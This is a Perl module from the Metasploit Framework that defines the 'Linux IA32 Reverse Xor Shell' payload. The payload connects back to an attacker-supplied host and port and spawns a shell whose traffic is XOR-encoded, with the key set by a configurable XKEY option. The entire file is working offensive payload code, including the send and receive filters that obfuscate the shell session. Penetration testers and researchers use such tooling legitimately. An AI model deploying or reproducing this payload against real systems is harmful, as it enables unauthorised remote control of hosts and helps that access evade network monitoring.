##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Payload::linux_ia32_reverse_xor;
use strict;
use base 'Msf::PayloadComponent::InlineEggPayload';
sub _Load {
Msf::PayloadComponent::InlineEggPayload->_Import('Msf::PayloadComponent::ReverseConnection');
__PACKAGE__->SUPER::_Load();
}
my $info =
{
'Name' => 'Linux IA32 Reverse Xor Shell',
'Version' => '$Revision: 1646 $',
'Description' => 'Connect back to attacker and spawn an encrypted shell',
'Authors' => [ 'gera[at]corest.com [InlineEgg License]', ],
'Arch' => [ 'x86' ],
'Priv' => 0,
'OS' => [ 'linux' ],
'Size' => 0,
'UserOpts' =>
{
'XKEY' => [1, 'BYTE', 'Byte to xor the connection with', 0x69],
}
};
sub new {
_Load();
my $class = shift;
my $hash = @_ ? shift : { };
$hash = $class->MergeHashRec($hash, {'Info' => $info});
my $self = $class->SUPER::new($hash, @_);
$self->{'Filename'} = $self->ScriptBase . '/payloads/external/linx86reverse_xor.py';
$self->_Info->{'Size'} = $self->_GenSize;
return($self);
}
sub _GenSize {
my $self = shift;
my $bin = $self->Generate({'LHOST' => '127.0.0.1', 'LPORT' => '4444', 'XKEY' => '55'});
return(length($bin));
}
sub RecvFilter {
my $self = shift;
my $data = shift;
my $xkey = $self->GetVar('XKEY');
$data = Pex::Encoder::XorByte($xkey, $data);
return($data);
}
sub SendFilter {
my $self = shift;
my $data = shift;
return($self->RecvFilter($data));
}
1;